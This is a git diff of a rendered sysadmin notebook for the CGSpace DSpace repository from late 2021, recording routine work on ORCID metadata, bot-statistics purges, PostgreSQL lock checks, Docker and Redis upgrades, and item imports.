                                                                                                                                                                                                                                                                                                                                          +      1 (103 rows)
                                                                                                                                                                                                                                                                                                                                          +      1  application_name
                                                                                                                                                                                                                                                                                                                                          +      9  psql
                                                                                                                                                                                                                                                                                                                                          +     94  dspaceWeb
                                                                                                                                                                                                                                                                                                                                          +

                                                                                                                                                                                                                                                                                                                                          2021-11-30

                                                                                                                                                                                                                                                                                                                                          • IWMI sent me ORCID identifiers for some new staff
                                                                                                                                                                                                                                                                                                                                              @@ -444,36 +444,36 @@ npm WARN EBADENGINE }
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                          $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                          -$ wc -l /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                          -1348 /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                            $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                            +$ wc -l /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                            +1348 /tmp/2021-11-30-combined-orcids.txt
                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                            • After I combined them and removed duplicates, I resolved all the names using my resolve-orcids.py script:
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                            $ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              $ ./ilri/resolve-orcids.py -i /tmp/2021-11-30-combined-orcids.txt -o /tmp/2021-11-30-combined-orcids-names.txt
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              • Then I updated some ORCID identifiers that had changed in the XML:
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              $ cat 2021-11-30-fix-orcids.csv
                                                                                                                                                                                                                                                                                                                                              -cg.creator.identifier,correct
                                                                                                                                                                                                                                                                                                                                              -"ADEBOWALE AKANDE: 0000-0002-6521-3272","ADEBOWALE AD AKANDE: 0000-0002-6521-3272"
                                                                                                                                                                                                                                                                                                                                              -"Daniel Ortiz Gonzalo: 0000-0002-5517-1785","Daniel Ortiz-Gonzalo: 0000-0002-5517-1785"
                                                                                                                                                                                                                                                                                                                                              -"FRIDAY ANETOR: 0000-0003-3137-1958","Friday Osemenshan Anetor: 0000-0003-3137-1958"
                                                                                                                                                                                                                                                                                                                                              -"Sander Muilerman: 0000-0001-9103-3294","Sander Muilerman-Rodrigo: 0000-0001-9103-3294"
                                                                                                                                                                                                                                                                                                                                              -$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -t 'correct' -m 247
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                $ cat 2021-11-30-fix-orcids.csv
                                                                                                                                                                                                                                                                                                                                                +cg.creator.identifier,correct
                                                                                                                                                                                                                                                                                                                                                +"ADEBOWALE AKANDE: 0000-0002-6521-3272","ADEBOWALE AD AKANDE: 0000-0002-6521-3272"
                                                                                                                                                                                                                                                                                                                                                +"Daniel Ortiz Gonzalo: 0000-0002-5517-1785","Daniel Ortiz-Gonzalo: 0000-0002-5517-1785"
                                                                                                                                                                                                                                                                                                                                                +"FRIDAY ANETOR: 0000-0003-3137-1958","Friday Osemenshan Anetor: 0000-0003-3137-1958"
                                                                                                                                                                                                                                                                                                                                                +"Sander Muilerman: 0000-0001-9103-3294","Sander Muilerman-Rodrigo: 0000-0001-9103-3294"
                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/fix-metadata-values.py -i 2021-11-30-fix-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.identifier -t 'correct' -m 247
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                • Tag existing items from the IWMI’s new authors with ORCID iDs using add-orcid-identifiers-csv.py (7 new metadata fields added):
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                $ cat 2021-11-30-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                -dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                -"Liaqat, U.W.","Umar Waqas Liaqat: 0000-0001-9027-5232"
                                                                                                                                                                                                                                                                                                                                                -"Liaqat, Umar Waqas","Umar Waqas Liaqat: 0000-0001-9027-5232"
                                                                                                                                                                                                                                                                                                                                                -"Munyaradzi, M.","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
                                                                                                                                                                                                                                                                                                                                                -"Mutenje, Munyaradzi","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
                                                                                                                                                                                                                                                                                                                                                -"Rex, William","William Rex: 0000-0003-4979-5257"
                                                                                                                                                                                                                                                                                                                                                -"Shrestha, Shisher","Nirman Shrestha: 0000-0002-0996-8611"
                                                                                                                                                                                                                                                                                                                                                -$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                $ cat 2021-11-30-add-orcids.csv 
                                                                                                                                                                                                                                                                                                                                                +dc.contributor.author,cg.creator.identifier
                                                                                                                                                                                                                                                                                                                                                +"Liaqat, U.W.","Umar Waqas Liaqat: 0000-0001-9027-5232"
                                                                                                                                                                                                                                                                                                                                                +"Liaqat, Umar Waqas","Umar Waqas Liaqat: 0000-0001-9027-5232"
                                                                                                                                                                                                                                                                                                                                                +"Munyaradzi, M.","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
                                                                                                                                                                                                                                                                                                                                                +"Mutenje, Munyaradzi","Munyaradzi Junia Mutenje: 0000-0002-7829-9300"
                                                                                                                                                                                                                                                                                                                                                +"Rex, William","William Rex: 0000-0003-4979-5257"
                                                                                                                                                                                                                                                                                                                                                +"Shrestha, Shisher","Nirman Shrestha: 0000-0002-0996-8611"
                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/add-orcid-identifiers-csv.py -i 2021-11-30-add-orcids.csv -db dspace -u dspace -p 'fuuu'
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                diff --git a/docs/2021-12/index.html b/docs/2021-12/index.html index 551863d18..f5f21f70d 100644 --- a/docs/2021-12/index.html +++ b/docs/2021-12/index.html @@ -40,7 +40,7 @@ Purging 455 hits from WhatsApp in statistics Total number of bot hits purged: 3679 "/> - + @@ -131,13 +131,13 @@ Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                              • Atmire merged some changes I had submitted to the COUNTER-Robots project
                                                                                                                                                                                                                                                                                                                                              • I updated our local spider user agents and then re-ran the list with my check-spider-hits.sh script on CGSpace:
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                              -Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                              -Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                              -Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                              -

                                                                                                                                                                                                                                                                                                                                              2021-12-02

                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              $ ./ilri/check-spider-hits.sh -f /tmp/agents -p  
                                                                                                                                                                                                                                                                                                                                              +Purging 1989 hits from The Knowledge AI in statistics
                                                                                                                                                                                                                                                                                                                                              +Purging 1235 hits from MaCoCu in statistics
                                                                                                                                                                                                                                                                                                                                              +Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                              +Total number of bot hits purged: 3679
                                                                                                                                                                                                                                                                                                                                              +

                                                                                                                                                                                                                                                                                                                                              2021-12-02

                                                                                                                                                                                                                                                                                                                                              • Francesca from Alliance asked me for help with approving a submission that gets stuck
                                                                                                                                                                                                                                                                                                                                                  @@ -145,23 +145,23 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                              $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                              -      1 
                                                                                                                                                                                                                                                                                                                                              -      1 ------------------
                                                                                                                                                                                                                                                                                                                                              -      1 (1437 rows)
                                                                                                                                                                                                                                                                                                                                              -      1  application_name 
                                                                                                                                                                                                                                                                                                                                              -      9  psql
                                                                                                                                                                                                                                                                                                                                              -   1428  dspaceWeb
                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                $ psql -c "SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                +      1 
                                                                                                                                                                                                                                                                                                                                                +      1 ------------------
                                                                                                                                                                                                                                                                                                                                                +      1 (1437 rows)
                                                                                                                                                                                                                                                                                                                                                +      1  application_name 
                                                                                                                                                                                                                                                                                                                                                +      9  psql
                                                                                                                                                                                                                                                                                                                                                +   1428  dspaceWeb
                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                • Munin shows the same:

                                                                                                                                                                                                                                                                                                                                                PostgreSQL locks week

                                                                                                                                                                                                                                                                                                                                                • Last month I enabled the log_lock_waits in PostgreSQL so I checked the log and was surprised to find only a few since I restarted PostgreSQL three days ago:
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                # grep -E '^2021-(11-29|11-30|12-01|12-02)' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                -15
                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  # grep -E '^2021-(11-29|11-30|12-01|12-02)' /var/log/postgresql/postgresql-10-main.log | grep -c 'still waiting for'
                                                                                                                                                                                                                                                                                                                                                  +15
                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                  • I think you could analyze the locks for the dspaceWeb user (XMLUI) and find out what queries were locking… but it’s so much information and I don’t know where to start
                                                                                                                                                                                                                                                                                                                                                    • For now I just restarted PostgreSQL…
                                                                                                                                                                                                                                                                                                                                                    • @@ -250,9 +250,9 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                    • I noticed a strange user agent in the XMLUI logs on CGSpace:
                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                    20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] "GET /handle/10568/33203 HTTP/1.1" 200 6328 "-" "python-requests/2.25.1"
                                                                                                                                                                                                                                                                                                                                                    -20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] "GET /handle/10568/33203 HTTP/2.0" 200 6315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                      20.84.225.129 - - [07/Dec/2021:11:51:24 +0100] "GET /handle/10568/33203 HTTP/1.1" 200 6328 "-" "python-requests/2.25.1"
                                                                                                                                                                                                                                                                                                                                                      +20.84.225.129 - - [07/Dec/2021:11:51:27 +0100] "GET /handle/10568/33203 HTTP/2.0" 200 6315 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/88.0.4298.0 Safari/537.36"
                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                      • I looked into it more and I see a dozen other IPs using that user agent, and they are all owned by Microsoft
                                                                                                                                                                                                                                                                                                                                                        • It could be someone on Azure?
                                                                                                                                                                                                                                                                                                                                                        • @@ -261,11 +261,11 @@ Purging 455 hits from WhatsApp in statistics
                                                                                                                                                                                                                                                                                                                                                        • I purged 34,000 hits from this user agent in our Solr statistics:
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                        $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                        -Purging 34458 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                        -Total number of bot hits purged: 34458
                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          $ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
                                                                                                                                                                                                                                                                                                                                                          +Purging 34458 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          +Total number of bot hits purged: 34458
                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                          • Meeting with partners about repositories in the One CGIAR

                                                                                                                                                                                                                                                                                                                                                          2021-12-08

                                                                                                                                                                                                                                                                                                                                                          @@ -307,26 +307,26 @@ Purging 34458 hits from HeadlessChrome in statistics
                                                                                                                                                                                                                                                                                                                                                          • I finally caught some stuck locks on CGSpace after checking several times per day for the last week:
                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                          $ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
                                                                                                                                                                                                                                                                                                                                                          -1508
                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            $ psql -c "SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid" | wc -l
                                                                                                                                                                                                                                                                                                                                                            +1508
                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                            • Now looking at the locks query sorting by age of locks:
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                            $ cat locks-age.sql 
                                                                                                                                                                                                                                                                                                                                                            -SELECT a.datname,
                                                                                                                                                                                                                                                                                                                                                            -         l.relation::regclass,
                                                                                                                                                                                                                                                                                                                                                            -         l.transactionid,
                                                                                                                                                                                                                                                                                                                                                            -         l.mode,
                                                                                                                                                                                                                                                                                                                                                            -         l.GRANTED,
                                                                                                                                                                                                                                                                                                                                                            -         a.usename,
                                                                                                                                                                                                                                                                                                                                                            -         a.query,
                                                                                                                                                                                                                                                                                                                                                            -         a.query_start,
                                                                                                                                                                                                                                                                                                                                                            -         age(now(), a.query_start) AS "age",
                                                                                                                                                                                                                                                                                                                                                            -         a.pid
                                                                                                                                                                                                                                                                                                                                                            -FROM pg_stat_activity a
                                                                                                                                                                                                                                                                                                                                                            -JOIN pg_locks l ON l.pid = a.pid
                                                                                                                                                                                                                                                                                                                                                            -ORDER BY a.query_start;
                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                              $ cat locks-age.sql 
                                                                                                                                                                                                                                                                                                                                                              +SELECT a.datname,
                                                                                                                                                                                                                                                                                                                                                              +         l.relation::regclass,
                                                                                                                                                                                                                                                                                                                                                              +         l.transactionid,
                                                                                                                                                                                                                                                                                                                                                              +         l.mode,
                                                                                                                                                                                                                                                                                                                                                              +         l.GRANTED,
                                                                                                                                                                                                                                                                                                                                                              +         a.usename,
                                                                                                                                                                                                                                                                                                                                                              +         a.query,
                                                                                                                                                                                                                                                                                                                                                              +         a.query_start,
                                                                                                                                                                                                                                                                                                                                                              +         age(now(), a.query_start) AS "age",
                                                                                                                                                                                                                                                                                                                                                              +         a.pid
                                                                                                                                                                                                                                                                                                                                                              +FROM pg_stat_activity a
                                                                                                                                                                                                                                                                                                                                                              +JOIN pg_locks l ON l.pid = a.pid
                                                                                                                                                                                                                                                                                                                                                              +ORDER BY a.query_start;
                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                              • The oldest locks are 9 hours and 26 minutes old and the time on the server is Tue Dec 14 18:41:58 CET 2021, so it seems something happened around 9:15 this morning
                                                                                                                                                                                                                                                                                                                                                                • I looked at the maintenance tasks and there is nothing running around then (only the sitemap update that runs at 8AM, and should be quick)
                                                                                                                                                                                                                                                                                                                                                                • @@ -354,25 +354,25 @@ ORDER BY a.query_start;
                                                                                                                                                                                                                                                                                                                                                                • I created a SAF archive with SAFBuilder and then imported it to DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2021-12-16-green-covers.map
                                                                                                                                                                                                                                                                                                                                                                -

                                                                                                                                                                                                                                                                                                                                                                2021-12-19

                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2021-12-16-green-covers.map
                                                                                                                                                                                                                                                                                                                                                                +

                                                                                                                                                                                                                                                                                                                                                                2021-12-19

                                                                                                                                                                                                                                                                                                                                                                • I tried to update all Docker containers on AReS and then run a build, but I got an error in the backend:
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                > openrxv-backend@0.0.1 build
                                                                                                                                                                                                                                                                                                                                                                -> nest build
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
                                                                                                                                                                                                                                                                                                                                                                -                 ~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                -node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
                                                                                                                                                                                                                                                                                                                                                                -                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                -Found 2 error(s).
                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  > openrxv-backend@0.0.1 build
                                                                                                                                                                                                                                                                                                                                                                  +> nest build
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias 'AggregationsAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate<any> | AggregationsTermsAggregate<any> | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate<AggregationsBucket> | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
                                                                                                                                                                                                                                                                                                                                                                  +                 ~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                  +node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias 'AggregationsSingleBucketAggregate' circularly references itself.
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
                                                                                                                                                                                                                                                                                                                                                                  +                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  +Found 2 error(s).
                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                  • I’m not sure why because I build the backend successfully on my local machine…
                                                                                                                                                                                                                                                                                                                                                                    • For now I just ran all the system updates and rebooted the machine (linode20)
                                                                                                                                                                                                                                                                                                                                                                    • @@ -389,39 +389,39 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
                                                                                                                                                                                                                                                                                                                                                                    • But since software sucks, now I get an error in the frontend while starting nginx:
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                    nginx: [emerg] host not found in upstream "backend:3000" in /etc/nginx/conf.d/default.conf:2
                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      nginx: [emerg] host not found in upstream "backend:3000" in /etc/nginx/conf.d/default.conf:2
                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                      • In other news, looking at updating our Redis from version 5 to 6 (which is slightly less old, but still old!) and I’m happy to see that the release notes for version 6 say that it is compatible with 5 except for one minor thing that we don’t seem to be using (SPOP?)
                                                                                                                                                                                                                                                                                                                                                                      • For reference I see that our Redis 5 container is based on Debian 11, which I didn’t expect… but I still want to try to upgrade to Redis 6 eventually:
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                      $ docker exec -it redis bash
                                                                                                                                                                                                                                                                                                                                                                      -root@23692d6b51c5:/data# cat /etc/os-release 
                                                                                                                                                                                                                                                                                                                                                                      -PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"
                                                                                                                                                                                                                                                                                                                                                                      -NAME="Debian GNU/Linux"
                                                                                                                                                                                                                                                                                                                                                                      -VERSION_ID="11"
                                                                                                                                                                                                                                                                                                                                                                      -VERSION="11 (bullseye)"
                                                                                                                                                                                                                                                                                                                                                                      -VERSION_CODENAME=bullseye
                                                                                                                                                                                                                                                                                                                                                                      -ID=debian
                                                                                                                                                                                                                                                                                                                                                                      -HOME_URL="https://www.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                      -SUPPORT_URL="https://www.debian.org/support"
                                                                                                                                                                                                                                                                                                                                                                      -BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        $ docker exec -it redis bash
                                                                                                                                                                                                                                                                                                                                                                        +root@23692d6b51c5:/data# cat /etc/os-release 
                                                                                                                                                                                                                                                                                                                                                                        +PRETTY_NAME="Debian GNU/Linux 11 (bullseye)"
                                                                                                                                                                                                                                                                                                                                                                        +NAME="Debian GNU/Linux"
                                                                                                                                                                                                                                                                                                                                                                        +VERSION_ID="11"
                                                                                                                                                                                                                                                                                                                                                                        +VERSION="11 (bullseye)"
                                                                                                                                                                                                                                                                                                                                                                        +VERSION_CODENAME=bullseye
                                                                                                                                                                                                                                                                                                                                                                        +ID=debian
                                                                                                                                                                                                                                                                                                                                                                        +HOME_URL="https://www.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                        +SUPPORT_URL="https://www.debian.org/support"
                                                                                                                                                                                                                                                                                                                                                                        +BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                        • I bumped the version to 6 on my local test machine and the logs look good:
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                        $ docker logs redis
                                                                                                                                                                                                                                                                                                                                                                        -1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
                                                                                                                                                                                                                                                                                                                                                                        -1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
                                                                                                                                                                                                                                                                                                                                                                        -1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.584 # Server initialized
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
                                                                                                                                                                                                                                                                                                                                                                        -1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          $ docker logs redis
                                                                                                                                                                                                                                                                                                                                                                          +1:C 19 Dec 2021 19:27:15.583 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
                                                                                                                                                                                                                                                                                                                                                                          +1:C 19 Dec 2021 19:27:15.583 # Redis version=6.2.6, bits=64, commit=00000000, modified=0, pid=1, just started
                                                                                                                                                                                                                                                                                                                                                                          +1:C 19 Dec 2021 19:27:15.583 # Warning: no config file specified, using the default config. In order to specify a config file use redis-server /path/to/redis.conf
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.584 * monotonic clock: POSIX clock_gettime
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.584 * Running mode=standalone, port=6379.
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.584 # Server initialized
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.585 * Loading RDB produced by version 5.0.14
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.585 * RDB age 33 seconds
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.585 * RDB memory usage when created 3.17 Mb
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.595 # Done loading RDB, keys loaded: 932, keys expired: 1.
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.595 * DB loaded from disk: 0.011 seconds
                                                                                                                                                                                                                                                                                                                                                                          +1:M 19 Dec 2021 19:27:15.595 * Ready to accept connections
                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                          • The interface and harvesting all work as expected…
                                                                                                                                                                                                                                                                                                                                                                            • I pushed the update to OpenRXV
                                                                                                                                                                                                                                                                                                                                                                            • @@ -443,8 +443,8 @@ BUG_REPORT_URL="https://bugs.debian.org/"
                                                                                                                                                                                                                                                                                                                                                                            • Move invalid AGROVOC subjects in Gaia’s eighteen green cover items on DSpace Test to cg.subject.system
                                                                                                                                                                                                                                                                                                                                                                            • I created an “approve” user for Rafael from CIAT to do tests on DSpace Test:
                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                            $ dspace user -a -m rafael-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuuuu'
                                                                                                                                                                                                                                                                                                                                                                            -

                                                                                                                                                                                                                                                                                                                                                                            2021-12-27

